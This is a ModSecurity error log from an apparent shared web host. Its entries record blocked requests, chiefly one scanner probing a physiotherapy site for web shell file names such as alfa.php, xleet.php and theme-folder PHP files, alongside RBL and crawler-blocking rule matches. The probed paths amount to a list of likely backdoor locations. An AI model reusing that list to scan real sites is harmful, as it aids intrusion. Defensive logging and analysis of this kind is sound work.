[Tue May 26 14:22:22.538866 2026] [security2:error] [pid 606909:tid 607105] [client 20.226.60.108:22398] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/file.php"] [unique_id "ahVfRl0yRtX9qA7aVUVYiwAAAMc"]
[Tue May 26 14:22:22.538968 2026] [security2:error] [pid 606909:tid 607105] [client 20.226.60.108:22398] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/file.php"] [unique_id "ahVfRl0yRtX9qA7aVUVYiwAAAMc"]
[Tue May 26 14:22:22.893214 2026] [security2:error] [pid 606909:tid 607165] [client 20.226.60.108:14483] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wk/index.php"] [unique_id "ahVfRl0yRtX9qA7aVUVYlQAAAQM"]
[Tue May 26 14:22:22.893329 2026] [security2:error] [pid 606909:tid 607165] [client 20.226.60.108:14483] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wk/index.php"] [unique_id "ahVfRl0yRtX9qA7aVUVYlQAAAQM"]
[Tue May 26 14:22:23.208271 2026] [security2:error] [pid 606909:tid 606962] [remote 109.205.180.55:46644] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.180.205.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVfR10yRtX9qA7aVUVYngAA_TQ"]
[Tue May 26 14:22:23.250465 2026] [security2:error] [pid 606909:tid 607039] [client 20.226.60.108:39121] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/about.php"] [unique_id "ahVfR10yRtX9qA7aVUVYpQAAAIU"]
[Tue May 26 14:22:23.250601 2026] [security2:error] [pid 606909:tid 607039] [client 20.226.60.108:39121] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/about.php"] [unique_id "ahVfR10yRtX9qA7aVUVYpQAAAIU"]
[Tue May 26 14:22:23.511080 2026] [security2:error] [pid 606909:tid 607099] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfR10yRtX9qA7aVUVYpAAAAME"]
[Tue May 26 14:22:23.616633 2026] [security2:error] [pid 606909:tid 607094] [client 20.226.60.108:46640] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "huronwoodphysio.com"] [uri "/1.php"] [unique_id "ahVfR10yRtX9qA7aVUVYsAAAALw"]
[Tue May 26 14:22:23.616728 2026] [security2:error] [pid 606909:tid 607094] [client 20.226.60.108:46640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/1.php"] [unique_id "ahVfR10yRtX9qA7aVUVYsAAAALw"]
[Tue May 26 14:22:23.616825 2026] [security2:error] [pid 606909:tid 607094] [client 20.226.60.108:46640] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/1.php"] [unique_id "ahVfR10yRtX9qA7aVUVYsAAAALw"]
[Tue May 26 14:22:23.673670 2026] [security2:error] [pid 606909:tid 607127] [client 4.201.75.230:5466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/wp-good.php"] [unique_id "ahVfR10yRtX9qA7aVUVYsgAAAN0"]
[Tue May 26 14:22:23.980669 2026] [security2:error] [pid 606909:tid 607117] [client 20.226.60.108:22348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/alfa.php"] [unique_id "ahVfR10yRtX9qA7aVUVYwAAAANM"]
[Tue May 26 14:22:23.980766 2026] [security2:error] [pid 606909:tid 607117] [client 20.226.60.108:22348] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/alfa.php"] [unique_id "ahVfR10yRtX9qA7aVUVYwAAAANM"]
[Tue May 26 14:22:24.345438 2026] [security2:error] [pid 606909:tid 607064] [client 20.226.60.108:14523] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/edit.php"] [unique_id "ahVfSF0yRtX9qA7aVUVYxgAAAJ4"]
[Tue May 26 14:22:24.345528 2026] [security2:error] [pid 606909:tid 607064] [client 20.226.60.108:14523] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/edit.php"] [unique_id "ahVfSF0yRtX9qA7aVUVYxgAAAJ4"]
[Tue May 26 14:22:24.698242 2026] [security2:error] [pid 606909:tid 607103] [client 20.226.60.108:39820] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/elp.php"] [unique_id "ahVfSF0yRtX9qA7aVUVYzgAAAMU"]
[Tue May 26 14:22:24.698353 2026] [security2:error] [pid 606909:tid 607103] [client 20.226.60.108:39820] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/elp.php"] [unique_id "ahVfSF0yRtX9qA7aVUVYzgAAAMU"]
[Tue May 26 14:22:25.063441 2026] [security2:error] [pid 606909:tid 607144] [client 20.226.60.108:14474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/classwithtostring.php"] [unique_id "ahVfSV0yRtX9qA7aVUVY4AAAAO4"]
[Tue May 26 14:22:25.063565 2026] [security2:error] [pid 606909:tid 607144] [client 20.226.60.108:14474] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/classwithtostring.php"] [unique_id "ahVfSV0yRtX9qA7aVUVY4AAAAO4"]
[Tue May 26 14:22:25.221922 2026] [security2:error] [pid 606909:tid 607160] [client 20.206.67.134:3370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/mbcdnswo.php"] [unique_id "ahVfSV0yRtX9qA7aVUVY5wAAAP4"], referer: www.google.com
[Tue May 26 14:22:25.429516 2026] [security2:error] [pid 606909:tid 607082] [client 20.226.60.108:46597] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/666.php"] [unique_id "ahVfSV0yRtX9qA7aVUVY6AAAALA"]
[Tue May 26 14:22:25.429657 2026] [security2:error] [pid 606909:tid 607082] [client 20.226.60.108:46597] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/666.php"] [unique_id "ahVfSV0yRtX9qA7aVUVY6AAAALA"]
[Tue May 26 14:22:25.518934 2026] [security2:error] [pid 606909:tid 607123] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfSV0yRtX9qA7aVUVY5gAAANk"]
[Tue May 26 14:22:25.810308 2026] [security2:error] [pid 606909:tid 607055] [client 114.119.128.56:46933] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVfSV0yRtX9qA7aVUVY-gAAAJU"], referer: http://glorodavionics.com/index.php?route=product/product&product_id=219
[Tue May 26 14:22:25.993488 2026] [security2:error] [pid 606909:tid 607147] [client 20.226.60.108:39849] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "huronwoodphysio.com"] [uri "/wp-admin/index.php"] [unique_id "ahVfSV0yRtX9qA7aVUVY-QAAAPE"]
[Tue May 26 14:22:26.064580 2026] [security2:error] [pid 606909:tid 607129] [client 113.173.153.210:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfSV0yRtX9qA7aVUVY9QAAAN8"]
[Tue May 26 14:22:26.286049 2026] [security2:error] [pid 606909:tid 607077] [client 20.206.67.134:3328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVfSl0yRtX9qA7aVUVZDgAAAKs"]
[Tue May 26 14:22:26.636269 2026] [security2:error] [pid 606909:tid 607161] [client 20.226.60.108:22346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "huronwoodphysio.com"] [uri "/wp-admin/index.php"] [unique_id "ahVfSl0yRtX9qA7aVUVZEQAAAP8"]
[Tue May 26 14:22:26.804340 2026] [security2:error] [pid 606909:tid 606959] [remote 74.7.241.58:33862] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVfSl0yRtX9qA7aVUVZHgAAvzE"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/jv
[Tue May 26 14:22:27.042765 2026] [security2:error] [pid 606909:tid 607111] [client 20.226.60.108:22346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahVfSl0yRtX9qA7aVUVZHwAAAM0"]
[Tue May 26 14:22:27.042999 2026] [security2:error] [pid 606909:tid 607111] [client 20.226.60.108:22346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahVfSl0yRtX9qA7aVUVZHwAAAM0"]
[Tue May 26 14:22:27.219584 2026] [security2:error] [pid 606909:tid 607087] [client 20.226.60.108:39849] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/ws54.php"] [unique_id "ahVfS10yRtX9qA7aVUVZJgAAALU"]
[Tue May 26 14:22:27.219713 2026] [security2:error] [pid 606909:tid 607087] [client 20.226.60.108:39849] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/ws54.php"] [unique_id "ahVfS10yRtX9qA7aVUVZJgAAALU"]
[Tue May 26 14:22:27.589611 2026] [security2:error] [pid 606909:tid 607060] [client 20.226.60.108:42326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/deepseek_d.php"] [unique_id "ahVfS10yRtX9qA7aVUVZLQAAAJo"]
[Tue May 26 14:22:27.589742 2026] [security2:error] [pid 606909:tid 607060] [client 20.226.60.108:42326] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/deepseek_d.php"] [unique_id "ahVfS10yRtX9qA7aVUVZLQAAAJo"]
[Tue May 26 14:22:27.948085 2026] [security2:error] [pid 606909:tid 607052] [client 20.226.60.108:19126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/nw.php"] [unique_id "ahVfS10yRtX9qA7aVUVZOgAAAJI"]
[Tue May 26 14:22:27.948225 2026] [security2:error] [pid 606909:tid 607052] [client 20.226.60.108:19126] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/nw.php"] [unique_id "ahVfS10yRtX9qA7aVUVZOgAAAJI"]
[Tue May 26 14:22:28.048349 2026] [security2:error] [pid 606909:tid 607139] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfS10yRtX9qA7aVUVZMAAAAOk"]
[Tue May 26 14:22:28.301465 2026] [security2:error] [pid 606909:tid 607164] [client 20.226.60.108:14514] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/xleet.php"] [unique_id "ahVfTF0yRtX9qA7aVUVZSQAAAQI"]
[Tue May 26 14:22:28.301582 2026] [security2:error] [pid 606909:tid 607164] [client 20.226.60.108:14514] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/xleet.php"] [unique_id "ahVfTF0yRtX9qA7aVUVZSQAAAQI"]
[Tue May 26 14:22:28.563600 2026] [security2:error] [pid 606909:tid 607158] [client 202.141.83.254:53945] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfTF0yRtX9qA7aVUVZSwAAAPw"]
[Tue May 26 14:22:28.563740 2026] [security2:error] [pid 606909:tid 607158] [client 202.141.83.254:53945] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfTF0yRtX9qA7aVUVZSwAAAPw"]
[Tue May 26 14:22:28.666795 2026] [security2:error] [pid 606909:tid 607074] [client 20.226.60.108:22338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp.php"] [unique_id "ahVfTF0yRtX9qA7aVUVZTAAAAKg"]
[Tue May 26 14:22:28.666927 2026] [security2:error] [pid 606909:tid 607074] [client 20.226.60.108:22338] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp.php"] [unique_id "ahVfTF0yRtX9qA7aVUVZTAAAAKg"]
[Tue May 26 14:22:29.029360 2026] [security2:error] [pid 606909:tid 607040] [client 20.226.60.108:14408] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/155.php"] [unique_id "ahVfTV0yRtX9qA7aVUVZVgAAAIY"]
[Tue May 26 14:22:29.029477 2026] [security2:error] [pid 606909:tid 607040] [client 20.226.60.108:14408] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/155.php"] [unique_id "ahVfTV0yRtX9qA7aVUVZVgAAAIY"]
[Tue May 26 14:22:29.396302 2026] [security2:error] [pid 606909:tid 607113] [client 20.226.60.108:14445] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/96i.php"] [unique_id "ahVfTV0yRtX9qA7aVUVZYwAAAM8"]
[Tue May 26 14:22:29.396428 2026] [security2:error] [pid 606909:tid 607113] [client 20.226.60.108:14445] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/96i.php"] [unique_id "ahVfTV0yRtX9qA7aVUVZYwAAAM8"]
[Tue May 26 14:22:29.768535 2026] [security2:error] [pid 606909:tid 607142] [client 20.226.60.108:39115] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/as.php"] [unique_id "ahVfTV0yRtX9qA7aVUVZawAAAOw"]
[Tue May 26 14:22:29.768672 2026] [security2:error] [pid 606909:tid 607142] [client 20.226.60.108:39115] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/as.php"] [unique_id "ahVfTV0yRtX9qA7aVUVZawAAAOw"]
[Tue May 26 14:22:30.142003 2026] [security2:error] [pid 606909:tid 607116] [client 20.226.60.108:19117] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/php8.php"] [unique_id "ahVfTl0yRtX9qA7aVUVZfAAAANI"]
[Tue May 26 14:22:30.142127 2026] [security2:error] [pid 606909:tid 607116] [client 20.226.60.108:19117] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/php8.php"] [unique_id "ahVfTl0yRtX9qA7aVUVZfAAAANI"]
[Tue May 26 14:22:30.280004 2026] [security2:error] [pid 606909:tid 607125] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfTV0yRtX9qA7aVUVZdAAAANs"]
[Tue May 26 14:22:30.504639 2026] [security2:error] [pid 606909:tid 607066] [client 20.226.60.108:54966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/admin.php"] [unique_id "ahVfTl0yRtX9qA7aVUVZgwAAAKA"]
[Tue May 26 14:22:30.504795 2026] [security2:error] [pid 606909:tid 607066] [client 20.226.60.108:54966] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-content/admin.php"] [unique_id "ahVfTl0yRtX9qA7aVUVZgwAAAKA"]
[Tue May 26 14:22:30.863140 2026] [security2:error] [pid 606909:tid 607111] [client 20.226.60.108:19102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/222.php"] [unique_id "ahVfTl0yRtX9qA7aVUVZjQAAAM0"]
[Tue May 26 14:22:30.863318 2026] [security2:error] [pid 606909:tid 607111] [client 20.226.60.108:19102] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/222.php"] [unique_id "ahVfTl0yRtX9qA7aVUVZjQAAAM0"]
[Tue May 26 14:22:31.214489 2026] [security2:error] [pid 606909:tid 607143] [client 20.226.60.108:46654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/themes/pridmag/il.php"] [unique_id "ahVfT10yRtX9qA7aVUVZkQAAAO0"]
[Tue May 26 14:22:31.214635 2026] [security2:error] [pid 606909:tid 607143] [client 20.226.60.108:46654] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-content/themes/pridmag/il.php"] [unique_id "ahVfT10yRtX9qA7aVUVZkQAAAO0"]
[Tue May 26 14:22:31.568934 2026] [security2:error] [pid 606909:tid 607042] [client 20.226.60.108:42346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/info.php"] [unique_id "ahVfT10yRtX9qA7aVUVZlwAAAIg"]
[Tue May 26 14:22:31.569045 2026] [security2:error] [pid 606909:tid 607042] [client 20.226.60.108:42346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/info.php"] [unique_id "ahVfT10yRtX9qA7aVUVZlwAAAIg"]
[Tue May 26 14:22:31.926641 2026] [security2:error] [pid 606909:tid 607154] [client 20.226.60.108:22390] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/a.php"] [unique_id "ahVfT10yRtX9qA7aVUVZnwAAAPg"]
